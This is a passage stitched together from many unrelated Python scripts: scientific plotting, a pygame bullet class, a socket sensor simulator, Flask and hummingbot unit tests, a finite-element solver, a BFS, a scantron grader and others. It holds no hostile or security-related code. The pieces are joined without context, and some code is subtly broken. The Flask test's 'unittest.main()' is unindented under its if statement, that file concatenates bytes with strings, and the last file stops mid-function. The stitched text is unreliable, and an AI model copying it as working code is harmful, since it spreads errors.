        cv2.rectangle(img, (x, y), (x + w, y + h), (50, 50, 255), 2)

cv2.imshow('img', img)
cv2.waitKey(0)
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 20:19:50 2020
@author: Nick Strandwitz
"""
### Plots LEIS profile from ascii file output of IONTof Qtac
### Created 2/29/2020 by Strandwitz; Last modified 2/29/2020 by Strandwitz
###
### TO DO: create stable loop for overlaying multiple scans
### Some general adjustable settings
lnwdth = 5    # line width in plot
collabels = ['scan', 'depth (nm)', 'dose', 'MoTe', 'Al/Si', 'O']  # column labels; manually input headers here, must match dimensions
mrksz = 15    # size of markers

### Bring up a dialog box to select one or more files
import tkinter as tk
from tkinter import filedialog

root = tk.Tk()
root.withdraw()
# Keep the file dialog on top of other windows.
root.call('wm', 'attributes', '.', '-topmost', True)
filepath = filedialog.askopenfilenames(initialdir = "C:/Users/Nick Strandwitz/Documents/NCS docs/Data/LU/19.12.18-19 LEIS Training TiMoN ScN MoOx/101419-3-1/profile/", title = "select file", filetypes = (("all files","*.*"),("all files","*.*")))
print(len(filepath))  # print number of files selected
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np

# Read in data: tab delimited, first row skipped
df33 = pd.read_csv(filepath[0], sep='\t', skiprows=1, header=None)
df33.columns = collabels  # apply the manual column labels

ax1 = plt.gca()  # instance of the current axes

# Plot dose (column 2) against each element/region column; the first call
# also sets the font size and figure size.
series_styles = [
    (3, 'red', 's', {'fontsize': 20, 'figsize': (8, 8)}),
    (4, 'blue', 'o', {}),
    (5, 'violet', '<', {}),
]
for col_index, color, marker, extra in series_styles:
    df33.plot(kind='line', x=df33.columns[2], y=df33.columns[col_index],
              color=color, marker=marker, markersize=mrksz,
              markeredgewidth=2, markeredgecolor='black',
              ax=ax1, lw=lnwdth, **extra)

# Axis labels, legend and frame formatting
ax1.set_xlabel("Dose (10$^{15}$ cm$^{-2}$)", fontsize=30, fontname="Arial")
ax1.set_ylabel("Counts", fontsize=30, fontname="Arial")
ax1.legend(loc=2, prop={'size': 22})
ax1.set_ylim(bottom=0)
plt.setp(ax1.spines.values(), linewidth=3)  # thickness of the plot box
ax1.tick_params(width=3, length=8, direction='in')
for tick in ax1.get_xticklabels():
    tick.set_fontname("Arial")
for tick in ax1.get_yticklabels():
    tick.set_fontname("Arial")
plt.tight_layout()  # keeps edges such as axis labels from being cut off

print(filepath[0])
# Split the selected path so the images land in the data file's directory.
splitpath = filepath[0].split('/')
pathh = filepath[0].replace(splitpath[-1], '')
plt.savefig(pathh + 'profile.pdf')
plt.savefig(pathh + 'profile.png')
plt.show()

# Derive a notebook name from the data file name.
varpathh = splitpath[-1].replace('.txt', '.ipynb')
print(varpathh)
|
import ffmpeg, re, os
import os.path as path
if __name__ == "__main__":
    # Downscale one clip to 960x540 via ffmpeg-python's filter graph.
    # FIX: build paths from components so the script also works on POSIX
    # (the original hard-coded Windows '\\' separators inside the strings).
    clip_dir = path.relpath(path.join("..", "tripartito", "clips"))
    clip = path.join(clip_dir, "set01", "monster_S01E01_SQ0010_SH0010_V001.mp4")
    output = path.join(clip_dir, "shrinkydink.mp4")
    (
        ffmpeg
        .input(clip)
        .filter('scale', w=960, h=540)
        .output(output)
        .run()  # blocks until ffmpeg finishes transcoding
    )
import pygame
class Bullet(pygame.sprite.Sprite):
    """Horizontally travelling projectile that damages characters on contact."""

    def __init__(self, x, y, direction, bullet_img, SCREEN_WIDTH):
        pygame.sprite.Sprite.__init__(self)
        self.speed = 10                     # horizontal pixels per frame
        self.image = bullet_img
        self.rect = self.image.get_rect()
        self.rect.center = (x, y)
        self.direction = direction          # +1 = right, -1 = left
        self.SCREEN_WIDTH = SCREEN_WIDTH

    def update(self, screen_scroll, world, player, bullet_group, enemy_group):
        # move bullet (screen_scroll keeps it in sync with the camera)
        self.rect.x += (self.direction * self.speed) + screen_scroll
        # check if bullet has gone off screen
        if self.rect.right < 0 or self.rect.left > self.SCREEN_WIDTH:
            self.kill()
            return
        # check for collision with level tiles; stop at the first hit
        for tile in world.obstacle_list:
            if tile[1].colliderect(self.rect):
                self.kill()
                return
        # check collision with characters.
        # BUG FIX: the original used pygame.sprite.spritecollide(player,
        # bullet_group, False), which is true when ANY bullet in the group
        # overlaps the target - so one unrelated collision made every live
        # bullet apply damage and self-destruct. Test only THIS bullet's rect.
        if player.is_alive and self.rect.colliderect(player.rect):
            player.health -= 5
            self.kill()
            return
        for enemy in enemy_group:
            if enemy.is_alive and self.rect.colliderect(enemy.rect):
                enemy.health -= 25
                self.kill()
                return
|
# Generated by Django 2.0.3 on 2019-07-09 13:46
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Re-add the ``date`` column to ``watchlist`` (dropped in 0002) as a
    32-char CharField.

    NOTE(review): ``default=django.utils.timezone.now`` on a CharField means
    existing rows are backfilled with ``str(datetime)``; with
    ``preserve_default=False`` the default is used only for this backfill and
    is not kept on the model field. Confirm the resulting string format
    matches what the application writes into this column.
    """

    dependencies = [
        ('watchlist', '0002_remove_watchlist_date'),
    ]
    operations = [
        migrations.AddField(
            model_name='watchlist',
            name='date',
            field=models.CharField(default=django.utils.timezone.now, max_length=32),
            preserve_default=False,
        ),
    ]
|
import random
from threading import Thread
import datetime
import socket
from errno import EAGAIN, EWOULDBLOCK
from sys import exit
HEADER = 10  # width (bytes) of the fixed-size length prefix on every frame
IP = socket.gethostbyname(socket.gethostname())  # server runs on this machine
PORT = 5050
main_client = "Sensor"  # client name announced to the server on connect
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
now = datetime.datetime.now()  # launch-time snapshot; .hour drives the fake sensor ranges
message_list = [""]  # one-slot outbox shared between the console loop and the listener thread
# Try to connect to server when program launches
# If server is offline close program
def start_sensor():
    """Connect to the local server, announce this client as a sensor and run
    a blocking console loop until the user types STOP.

    Exits the process if the server cannot be reached.
    """
    # Handshake: connect, switch the socket to non-blocking mode (the
    # listener thread polls it), and send our client name with the
    # fixed-width length-prefix framing.
    try:
        client_socket.connect((IP, PORT))
        client_socket.setblocking(False)
        name_bytes = main_client.encode('utf-8')
        name_header = f"{len(name_bytes):<{HEADER}}".encode('utf-8')
        client_socket.send(name_header + name_bytes)
    except Exception as exc:
        print(exc)
        exit()

    # Daemon thread services the socket so that the blocking input() below
    # does not stall message handling.
    Thread(target=listen_for_message, daemon=True).start()

    print("\nWelcome to sensor client")

    # Console loop: the only accepted command is STOP/stop.
    while True:
        command = input("Type \"STOP\" to stop client\n"
                        "Input: ")
        if command in ("STOP", "stop"):
            exit()
        print("\n[ERROR] wrong command\n")
# This is a function that pretends to be a sensor
# It returns temperatures in slightly different ranges depending
# on the actual time of day we ask, to simulate reality
def get_temperature(data):
    """Simulated temperature sensor.

    ``data`` is the current hour (0-23); readings vary by time of day to look
    realistic. Returns a formatted string such as ``"Temperatur: 20.1 celsius"``,
    or a fixed fallback reading when ``data`` is unusable.

    FIX: the original mixed the ``data`` parameter with the module-level
    ``now.hour`` in its conditions. Since it is only ever called with
    ``now.hour`` the observable behavior is unchanged, but the function now
    depends solely on its argument and no branch can leave ``temp`` unbound.
    """
    try:
        if data <= 9:                       # night / early morning
            temp = round(random.uniform(19.8, 20.2), 1)
        elif data < 12:                     # late morning
            temp = round(random.uniform(20.2, 22.2), 1)
        elif data < 17:                     # afternoon peak
            temp = round(random.uniform(21.2, 23.2), 1)
        elif data < 20:                     # evening
            temp = round(random.uniform(20.2, 22.2), 1)
        else:                               # late night
            temp = round(random.uniform(19.8, 20.8), 1)
        return "Temperatur: " + str(temp) + " celsius"
    except Exception:
        # Non-numeric input (comparison raises) yields a safe default.
        return "Temperatur: 20.5 celsius"
# This is a function that pretends to be a sensor
# It returns humidity in slightly different ranges depending
# on the actual time of day we ask, to simulate reality
def get_humidity(data):
    """Simulated humidity sensor.

    ``data`` is the current hour (0-23); readings vary by time of day to look
    realistic. Returns a formatted string such as ``"Luftfuktighet: 35%"``,
    or a fixed fallback reading when ``data`` is unusable.

    FIX: like get_temperature, the original mixed ``data`` with the global
    ``now.hour``; the conditions now use only the argument (equivalent at the
    sole call site) and every numeric hour hits exactly one branch.
    """
    try:
        if data <= 9:                       # night / early morning
            humid = random.randint(30, 40)
        elif data < 12:                     # late morning
            humid = random.randint(24, 38)
        elif data < 17:                     # afternoon
            humid = random.randint(20, 30)
        elif data < 20:                     # evening
            humid = random.randint(22, 36)
        else:                               # late night
            humid = random.randint(30, 40)
        return "Luftfuktighet: " + str(humid) + "%"
    except Exception:
        # Non-numeric input (comparison raises) yields a safe default.
        return "Luftfuktighet: 30%"
# This function continuously sends messages to server
# and listens for messages from server
def listen_for_message():
    """Service the shared socket: push the queued outgoing message (if any)
    and drain incoming length-prefixed frames, answering sensor queries.

    Runs forever in a daemon thread; exits the process when the server closes
    the connection or an unexpected error occurs.
    """
    while True:
        # Outbox: a reply queued on the previous iteration is sent now,
        # using the same fixed-width length-prefix framing as the server.
        message = message_list[0]
        if message:
            payload = message.encode('utf-8')
            header = f"{len(payload):<{HEADER}}".encode('utf-8')
            client_socket.send(header + payload)
            message_list[0] = ""
        try:
            # Drain every complete (sender, message) frame pair buffered
            # on the non-blocking socket.
            while True:
                client_header = client_socket.recv(HEADER)
                if not len(client_header):
                    # Zero-length read means the server closed the socket.
                    print('Connection closed by the server')
                    exit()
                client_length = int(client_header.decode('utf-8').strip())
                client = client_socket.recv(client_length).decode('utf-8')

                message_header = client_socket.recv(HEADER)
                message_length = int(message_header.decode('utf-8').strip())
                message = client_socket.recv(message_length).decode('utf-8')
                print(f'{client} > {message}')

                # Recognised queries are answered on the next loop pass.
                if message == "?temperature":
                    message_list[0] = get_temperature(now.hour)
                if message == "?humidity":
                    message_list[0] = get_humidity(now.hour)
        # The socket is non-blocking, so "no data available" surfaces as an
        # IOError carrying errno EAGAIN or EWOULDBLOCK (OS-dependent); that
        # is the normal idle case and we simply loop again.
        # BUG FIX: the original wrote `e != EAGAIN`, comparing the exception
        # OBJECT to an int (always true), so EAGAIN was never actually
        # tolerated by that clause; compare e.errno on both sides.
        except IOError as e:
            if e.errno != EAGAIN and e.errno != EWOULDBLOCK:
                print('Reading error: {}'.format(str(e)))
                exit()
            continue
        # Something else went wrong
        except Exception as e:
            print('General: {}'.format(str(e)))
            exit()
if __name__ == "__main__":
    # Entry point: connect to the server and run the console loop.
    start_sensor()
|
import os
from application import app
import unittest
import json
class FlaskrTestCase(unittest.TestCase):
    """HTTP-level tests for the AMS Flask application.

    FIXES vs. the original:
      * ``token=self.token`` as a default argument raised NameError at class
        definition time (``self`` does not exist in the class body); the
        default is now ``None`` and resolved per call.
      * the test methods called helper methods without ``self.``.
      * responses are JSON dicts (json.loads), so fields are read with
        subscription (``res["success"]``) rather than attribute access.
      * ``print`` statements use the call form, valid on Python 2 and 3.
    """

    def setUp(self):
        print("WHAT")
        self.app = app.test_client()
        self.base_url = '/ams'
        self.token = None          # filled in by testGet_token on success
        print("WHAT EVEN")

    def tearDown(self):
        pass

    def get(self, url, args=None, token=None):
        """GET ``base_url + url``; defaults to the token cached by login."""
        if token is None:
            token = self.token
        print("")
        abs_url = self.base_url + url
        print("Testing Url: " + abs_url)
        res = self.app.get(abs_url, data=args, headers=token)
        res = res.data
        print("Response: " + res)
        return json.loads(res)

    def post(self, url, args=None, token=None):
        """POST to ``base_url + url``; defaults to the token cached by login."""
        if token is None:
            token = self.token
        print("")
        abs_url = self.base_url + url
        print("Testing Url: " + abs_url)
        res = self.app.post(abs_url, data=args, headers=token)
        res = res.data
        print("Response: " + res)
        return json.loads(res)

    # Testing Token
    def get_token(self, email, password):
        res = self.post("/login", dict(email=email, password=password))
        return res

    def testGet_token(self):
        print("ASDF")
        # Case I, Invalid Email and Password
        res = self.get_token("", "")
        assert res["success"] == False
        # Case II, Invalid Email
        res = self.get_token("", "SPLUG")
        assert res["success"] == False
        # Case III, Invalid Password
        res = self.get_token("phillip@sih.com", "")
        assert res["success"] == False
        # Case IV, Valid Credentials
        res = self.get_token("phillip@sih.com", "SPLUG")
        assert res["success"] == True
        self.token = res["token"]

    # Testing Room
    def list_rooms(self):
        res = self.get("/rooms")
        return res

    def test_list_rooms(self):
        res = self.list_rooms()
        return

    def room_detail(self, room_name):
        res = self.get("/" + room_name)
        return res

    def room_availibity(self, start_date, end_date):
        res = self.get("/rooms/available", dict(start_date=start_date, end_date=end_date))
        return res

    # Testing Booking
    def list_bookings(self):
        res = self.get("/bookings")
        return res

    def get_booking_detail(self, booking_id):
        res = self.get("/bookings/" + booking_id)
        return res

    def get_booking_activity(self, start_date, end_date):
        res = self.get("/bookings/activity", dict(start_date=start_date, end_date=end_date))
        return res

    def create_booking(self, request_dict):
        res = self.post("/bookings", request_dict)
        return res

    def edit_booking(self):
        pass

    def del_booking(self):
        pass

    def booking_history(self, room_name):
        pass

    # Testing Customer
    def list_customers(self):
        res = self.get("/customers")
        return res

    def get_customer_detail(self, customer_id):
        res = self.get("/customers/" + customer_id)
        return res

    def edit_customer(self, customer_id):
        pass

    def del_customer(self, customer_id):
        pass

    def create_customer(self, request_dict):
        res = self.post("/customers", request_dict)
        return res
if __name__ == '__main__':
unittest.main() |
import tornado.ioloop
import tornado.web
class IndexHandler(tornado.web.RequestHandler):
    """Serve the site index route ("/") with a plain-text message."""
    def get(self):
        self.write("This is the index context route")
class HelloWorld(tornado.web.RequestHandler):
    """Serve "/helloworld" with a plain-text greeting."""
    def get(self):
        self.write("Hello World, fellow pythonistas!")
# Route table mapping URL patterns to their handlers.
app = tornado.web.Application([
    (r"/",IndexHandler),
    (r"/helloworld",HelloWorld)
])
app.listen(8080)  # NOTE(review): port is hard-coded
tornado.ioloop.IOLoop.current().start()  # block here, serving requests forever
from __future__ import print_function, absolute_import, division
from numpy import *
from scipy import linalg
from scipy import sparse
class BuilderAndSolver:
    # When True, assemble into scipy sparse storage (dok -> csr); otherwise
    # use a dense numpy array.
    use_sparse_matrices = False
    '''ATTENTION!!
    this builder and solver assumes elements to be written IN RESIDUAL FORM and hence
    solves FOR A CORRECTION Dx'''
    def __init__(self, model_part, scheme):
        # model_part supplies Element/Condition iterators; scheme computes
        # each entity's local system and equation ids.
        self.scheme = scheme
        self.model_part = model_part
        self.dofset = set()        # all dofs, sorted, after SetupDofSet
        self.dirichlet_dof = set() # subset of dofs that are fixed
    def SetupDofSet(self):
        '''this function shapes the system to be built'''
        # start by iterating over all the elements and obtaining the list of
        # dofs
        aux = set()
        for elem in self.model_part.ElementIterators():
            unknowns = elem.GetDofList()
            for aaa in unknowns:
                aux.add(aaa)
        self.dofset = sorted(aux)
        # for dof in self.dofset:
        # print dof.node.Id, " ",dof.variable
        # assign an equation id (row/column index) to every dof, and record
        # the fixed ones for the Dirichlet pass
        counter = 0
        for dof in self.dofset:
            dof.SetEquationId(counter)
            counter += 1
            if(dof.IsFixed()):
                self.dirichlet_dof.add(dof)
    def SetupSystem(self, A, dx, b):
        # Allocate A, dx, b with the final system size; the passed-in
        # arguments are only placeholders (they are rebound and returned).
        ndof = len(self.dofset)
        # allocate system vectors
        b = zeros(ndof)
        dx = zeros(ndof)
        # allocate system matrix
        if(self.use_sparse_matrices == False): # dense case
            A = zeros((ndof, ndof))
        else: # allocate non zeros and transofrm to csr
            # Mark every potentially non-zero (i, j) with 1.0 so the dok ->
            # csr conversion keeps the full element connectivity pattern.
            A = sparse.dok_matrix((ndof, ndof))
            for elem in self.model_part.ElementIterators():
                # get non zero positions
                equation_id = self.scheme.EquationId(elem)
                for i in range(0, len(equation_id)):
                    eq_i = equation_id[i]
                    for j in range(0, len(equation_id)):
                        eq_j = equation_id[j]
                        A[eq_i,
                            eq_j] = 1.0 # set it to 1 to ensure it is converted well
                        # problem here is that in converting zero entries are
                        # discarded
            A = A.tocsr()
        return [A, dx, b]
    # this function sets to
    def SetToZero(self, A, dx, b):
        # Zero out the system before each build, preserving the csr sparsity
        # pattern in the sparse case.
        ndof = len(self.dofset)
        if(self.use_sparse_matrices == False):
            # allocating a dense matrix. This should be definitely improved
            A = zeros((ndof, ndof))
            b = zeros(ndof)
            dx = zeros(ndof)
        else:
            # print A.todense()
            A = A.multiply(
                0.0) # only way i found to set to zero is to multiply by zero
            b = zeros(ndof)
            dx = zeros(ndof)
        return [A, dx, b]
    def ApplyDirichlet(self, A, dx, b):
        # Impose fixed dofs by zeroing their rows/columns and putting 1 on
        # the diagonal; rhs entries become 0 because the system is in
        # residual form (the correction at a fixed dof is zero).
        ndof = A.shape[0]
        if(self.use_sparse_matrices == False): #dense matrix!
            for dof in self.dirichlet_dof:
                fixed_eqn = dof.GetEquationId()
                for i in range(0, ndof):
                    A[fixed_eqn, i] = 0.0
                    A[i, fixed_eqn] = 0.0
                A[fixed_eqn, fixed_eqn] = 1.0
                b[fixed_eqn] = 0.0 # note that this is zero since we assume residual form!
        else:
            # expensive loop: exactly set to 1 the diagonal
            # could be done cheaper, but i want to guarantee accuracy
            aux = ones(ndof, dtype=bool)  # aux[i] == False marks a fixed dof
            for dof in self.dirichlet_dof:
                eq_id = dof.GetEquationId()
                aux[eq_id] = False
            ij = A.nonzero()
            for i, j in zip(ij[0], ij[1]):
                if(aux[i] == False or aux[j] == False):
                    A[i, j] = 0.0
            for dof in self.dirichlet_dof:
                eq_id = dof.GetEquationId()
                A[eq_id, eq_id] = 1.0
                b[eq_id] = 0.0
        return [A, dx, b]
    def Build(self, A, dx, b):
        # Assemble every element's and condition's local (lhs, rhs) into the
        # global system, after zeroing it.
        A, dx, b = self.SetToZero(A, dx, b)
        for elem in self.model_part.ElementIterators():
            # find where to assemble
            equation_id = self.scheme.EquationId(elem)
            # compute local contribution to the stiffness matrix
            [lhs, rhs] = self.scheme.CalculateLocalSystem(elem)
            # assembly to the matrix
            for i in range(0, len(equation_id)):
                eq_i = equation_id[i]
                b[eq_i] += rhs[i]
                for j in range(0, len(equation_id)):
                    eq_j = equation_id[j]
                    A[eq_i, eq_j] += lhs[i, j]
        for cond in self.model_part.ConditionIterators():
            # find where to assemble
            equation_id = self.scheme.EquationId(cond)
            # compute local contribution to the stiffness matrix
            [lhs, rhs] = self.scheme.CalculateLocalSystem(cond)
            # assembly to the matrix
            for i in range(0, len(equation_id)):
                eq_i = equation_id[i]
                b[eq_i] += rhs[i]
                for j in range(0, len(equation_id)):
                    eq_j = equation_id[j]
                    A[eq_i, eq_j] += lhs[i, j]
        return [A, dx, b]
    def BuildAndSolve(self, A, dx, b):
        # Full cycle: assemble, impose Dirichlet conditions, solve A dx = b
        # for the correction dx (dense or sparse solver as configured).
        A, dx, b = self.Build(A, dx, b)
        A, dx, b = self.ApplyDirichlet(A, dx, b)
        # print A
        if(self.use_sparse_matrices == False):
            dx = linalg.solve(A, b)
        else:
            from scipy.sparse.linalg import spsolve
            dx = sparse.linalg.spsolve(A, b)
        return [A, dx, b]
|
import warnings
with warnings.catch_warnings():
    warnings.filterwarnings("ignore",category=FutureWarning)
# NOTE(review): catch_warnings() restores the filter list when the block
# exits, and the block above is empty - presumably the intent was to silence
# import-time FutureWarnings; confirm and move the imports inside if so.
import logging
log = logging.getLogger('werkzeug')
import os
import librosa
import numpy as np
import scipy
from os import path
from pydub import AudioSegment
import matplotlib.pyplot as plt
import scipy.signal as sig
datadir = "../src/data/"   # analysis output location
musicdir = "../music/"     # input audio files
from tqdm import tqdm
from multiprocessing import Pool
from anistrophicDiffusion import anisotropic_diffusion
import time
# Load song
# perform block of analysis
# push server message
#
#%%
# Scratch cell: load the first file in the music folder and dump its samples.
src = os.listdir(musicdir)[0]
start = time.time()
y, sr = librosa.load(musicdir + src)  # y = mono samples, sr = sample rate
print(y)
x = input()  # pause so the output can be inspected
#%%
#%%
|
#Uses python3
import sys, os
import queue
def bfs(adj, x, q, shortest):
    """Breadth-first search over adjacency list ``adj`` from node ``x``.

    ``shortest`` must be pre-seeded with 0 at the start node and a large
    sentinel (>= int(2e9)) everywhere else; on return it holds hop counts
    for every node reachable from ``x``. ``q`` is used as the FIFO work
    list (visited nodes remain in it afterwards).

    PERF FIX: the original dequeued with ``q.pop(0)``, which is O(n) per
    pop; a moving head index keeps the list interface while making each
    dequeue O(1).
    """
    q.append(x)
    head = 0
    while head < len(q):
        x = q[head]
        head += 1
        for i in adj[x]:
            # Sentinel distance means "not yet discovered".
            if shortest[i] >= (int)(2e9):
                q.append(i)
                shortest[i] = shortest[x] + 1
def distance(adj, s, t):
    """Return the number of edges on a shortest s -> t path, or -1 when t
    is unreachable from s."""
    INF = (int)(2e9)               # sentinel: "not yet discovered"
    shortest = [INF] * len(adj)
    shortest[s] = 0
    bfs(adj, s, [], shortest)
    return -1 if shortest[t] >= INF else shortest[t]
if __name__ == '__main__':
    # sys.stdin = open(os.path.abspath(os.path.dirname(__file__)) + r'\test\01', 'r')
    # NOTE(review): this rebinds the builtin `input` to the whole stdin text.
    input = sys.stdin.read()
    data = list(map(int, input.split()))
    n, m = data[0:2]  # vertex count, edge count
    data = data[2:]
    # Edge list: pairs of 1-based endpoints interleaved in the data stream.
    edges = list(zip(data[0:(2 * m):2], data[1:(2 * m):2]))
    adj = [[] for _ in range(n)]
    for (a, b) in edges:
        # Undirected graph: add both directions, converting to 0-based ids.
        adj[a - 1].append(b - 1)
        adj[b - 1].append(a - 1)
    # Source and target follow the edge list in the input.
    s, t = data[2 * m] - 1, data[2 * m + 1] - 1
    print(distance(adj, s, t))
|
from typing import Optional
from unittest import TestCase
from hummingbot.connector.exchange.btc_markets import btc_markets_constants as CONSTANTS
from hummingbot.connector.exchange.btc_markets.btc_markets_order_book import BtcMarketsOrderBook
from hummingbot.core.data_type.common import TradeType
from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType, OrderBookRow
class TestOrderbook(TestCase):
    """Unit tests for BtcMarketsOrderBook message parsing.

    FIX: each snapshot/diff test originally asserted ``bids[1]`` twice and
    never checked the second ask level - a copy-paste slip; the duplicate
    assertion now checks ``asks[1]``. The shared fixtures and assertions are
    factored into private helpers to keep the three tests in sync.
    """

    def _order_book_event(self):
        """Sample snapshot/diff payload shared by the order book tests."""
        return {
            "snapshot": True,
            "snapshotId": 1578512833978000,
            "timestamp": '2020-01-08T19:47:13.986Z',
            "bids": [
                ['99.57', '0.55', 1],
                ['97.62', '3.20', 2],
                ['97.07', '0.9', 1],
                ['96.7', '1.9', 1],
                ['95.8', '7.0', 1]
            ],
            "asks": [
                ['100', '3.79', 3],
                ['101', '6.32', 2]
            ],
            "messageType": CONSTANTS.DIFF_EVENT_TYPE
        }

    def _assert_order_book_fields(self, message, event, expected_type):
        """Assert type/pair/update_id and the top two price levels per side."""
        self.assertEqual(message.type, expected_type)
        self.assertEqual(message.trading_pair, "BAT-AUD")
        self.assertEqual(message.update_id, event["snapshotId"])
        self.assertEqual(message.bids[0], OrderBookRow(float(event["bids"][0][0]), float(event["bids"][0][1]), update_id=1578512833978000))
        self.assertEqual(message.bids[1], OrderBookRow(float(event["bids"][1][0]), float(event["bids"][1][1]), update_id=1578512833978000))
        self.assertEqual(message.asks[0], OrderBookRow(float(event["asks"][0][0]), float(event["asks"][0][1]), update_id=1578512833978000))
        self.assertEqual(message.asks[1], OrderBookRow(float(event["asks"][1][0]), float(event["asks"][1][1]), update_id=1578512833978000))
        self.assertEqual(message.content["snapshotId"], event["snapshotId"])

    def test_snapshot_message_from_exchange_websocket(self):
        diff_event = self._order_book_event()
        diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.snapshot_message_from_exchange_websocket(
            diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
        )
        self._assert_order_book_fields(diff_message, diff_event, OrderBookMessageType.SNAPSHOT)

    def test_snapshot_message_from_exchange_rest(self):
        diff_event = self._order_book_event()
        diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.snapshot_message_from_exchange_rest(
            diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
        )
        self._assert_order_book_fields(diff_message, diff_event, OrderBookMessageType.SNAPSHOT)

    def test_diff_message_from_exchange(self):
        diff_event = self._order_book_event()
        diff_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.diff_message_from_exchange(
            diff_event, diff_event["timestamp"], {"marketId": "BAT-AUD"}
        )
        self._assert_order_book_fields(diff_message, diff_event, OrderBookMessageType.DIFF)

    def _trade_event(self, side):
        """Sample trade payload; ``side`` is 'Ask' (sell) or 'Bid' (buy)."""
        return {
            "marketId": "BAT-AUD",
            "timestamp": '2019-04-08T20:54:27.632Z',
            "tradeId": 3153171493,
            "price": '7370.11',
            "volume": '0.10901605',
            "side": side,
            "messageType": CONSTANTS.TRADE_EVENT_TYPE
        }

    def _assert_trade_fields(self, trade_message, expected_trade_type):
        self.assertEqual(trade_message.type, OrderBookMessageType.TRADE)
        self.assertEqual(trade_message.trading_pair, "BAT-AUD")
        self.assertEqual(trade_message.trade_id, 3153171493)
        self.assertEqual(trade_message.content["price"], "7370.11")
        self.assertEqual(trade_message.content["amount"], "0.10901605")
        self.assertEqual(trade_message.content["trade_type"], float(expected_trade_type.value))

    def test_sell_trade_message_from_exchange(self):
        trade_event = self._trade_event('Ask')
        trade_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.trade_message_from_exchange(
            trade_event, trade_event["timestamp"], {"marketId": "BAT-AUD"}
        )
        self._assert_trade_fields(trade_message, TradeType.SELL)

    def test_buy_trade_message_from_exchange(self):
        trade_event = self._trade_event('Bid')
        trade_message: Optional[OrderBookMessage] = BtcMarketsOrderBook.trade_message_from_exchange(
            trade_event, trade_event["timestamp"], {"marketId": "BAT-AUD"}
        )
        self._assert_trade_fields(trade_message, TradeType.BUY)
|
import os
import sys
# Make it run more easily outside of VSCode
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..")))
import costreport.data.db_session as db_session
from costreport.data.costcodes import Costcode
def main():
    """Initialise the database, then keep adding cost codes until the user
    aborts (Ctrl-C) or a validation error is raised."""
    init_db()
    while True:
        insert_a_costcode()
def _required_field(prompt, lowercase=True):
    """Read one required value from stdin; raise ValueError when empty.

    The value is stripped and (by default) lower-cased before the check,
    matching the original per-field validation.
    """
    value = input(prompt).strip()
    if lowercase:
        value = value.lower()
    if len(value) < 1:
        raise ValueError("Value cannot be NULL")
    return value


def insert_a_costcode():
    """Interactively collect one cost code and persist it.

    The prompt/validate pattern was repeated three times in the original;
    it is factored into _required_field, and the session is now closed.
    """
    c = Costcode()
    c.project_id = _required_field("Project id:")
    c.costcode = _required_field("Costcode ref:")
    # The description keeps the user's original casing.
    c.cost_code_description = _required_field("Costcode Description:", lowercase=False)

    session = db_session.create_session()
    try:
        session.add(c)
        session.commit()
    finally:
        session.close()  # release the connection even if commit fails
def init_db():
    """Resolve the sqlite file path relative to this script and initialise
    the global session factory."""
    here = os.path.dirname(__file__)
    db_file = os.path.abspath(os.path.join(here, "..", "db", "costreport.sqlite"))
    db_session.global_init(db_file)
if __name__ == "__main__":
    # Run the interactive cost-code entry loop.
    main()
|
# -------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Austin
#
# Created: 13/10/2014
# Copyright: (c) Austin 2014
# Licence: <your licence>
# -------------------------------------------------------------------------------
import sys
sys.path.append('/usr/local/lib/python3.4/site-packages')
#workaround for opencv not in pythonpath
import readPDF
from scantron import *
import write_xls
def main():
    """Grade a scanned test batch: split the input PDF into page images,
    read the answer key, grade each student sheet, and (optionally) write
    an xls summary.

    NOTE(review): read_key, grade_test and os appear to come from the
    star import of `scantron` - confirm before refactoring imports.
    """
    # inputs
    folder = sys.argv[1]#"test_folder2" # folder is the folder where images are written.
    xls = True
    # STEP 1: read in pdf, split into jpegs
    #keyPath = os.path.join(folder, "tests.pdf")
    [folder, num_students] = readPDF.process("tests.pdf", folder) # 2nd arg is outfolder
    # image names will be key.jpg, 0.jpg, 1.jpg, 2.jpg, etc.
    # return_message = "Successfully read PDF"
    # print return_message
    # STEP 2: read key
    file_key = os.path.join(folder, "key.jpg")
    print(file_key)
    key = read_key(file_key) # establish array of correct values
    # STEP 3: loop scanned tests (upper bound 1000; loop exits at the first
    # missing numbered image)
    if xls:
        all_answer = []
        all_correct = []
        all_id = []
        all_score = []
    for i in range(1000):
        file_name = "%d.jpg"%i
        full_path = os.path.join(folder, file_name)
        print(full_path)
        if not os.path.isfile(full_path):
            break
        score, correct_list, id, answer_list = grade_test(full_path, key, xls)
        # return student id and score
        if xls:
            all_correct.append(correct_list)
            all_answer.append(answer_list)
            all_id.append(id)
            all_score.append(score)
    write_xls.write(folder,key, all_id, all_score, all_correct, all_answer)
    #return_message = "Successfully graded tests"
    #print (return_message)
if __name__ == '__main__':
    main()
|
import sys
import os
import argparse
import struct
import math, csv
import numpy as np
riboseqDir = os.path.dirname(os.path.realpath(__file__)) ## add current directory as rootDir
sys.path.append(riboseqDir)
import rphelper as rph
# Workflow to get E, P, A sites occupancy on ribosomes
# density files are riboshifted already.
# Exclusion module implemented
### this is developed by Colin Wu, with a few modifications
class codonoccupancy(object):
    """
    Compute genome-wide E/P/A-site codon occupancies from riboshifted
    ribosome density files (workflow by Colin Wu, lightly modified).
    NOTE: written for Python 2 (print statements, dict.has_key); the
    codonaverage/occupancy methods also read the module-level `args` and
    `exclusionfiles` globals set in the __main__ block.
    """
    def __init__(self,sample_name,motifs,seqwin,UTRfilestring,cds5trim,cds3trim,exclusiondict,outfilepath,outlistfile):
        self.sample_name = sample_name
        self.motifs= motifs
        self.seqwin= seqwin
        self.UTRfilestring= UTRfilestring
        self.cds5trim= cds5trim
        self.cds3trim= cds3trim
        self.exclusiondict= exclusiondict
        self.outfilepath= outfilepath
        self.outlistfile= outlistfile
    def writerows(self, intable, outfilestring):
        # Dump a 2D table to a csv file.
        fc = open(outfilestring, "w")
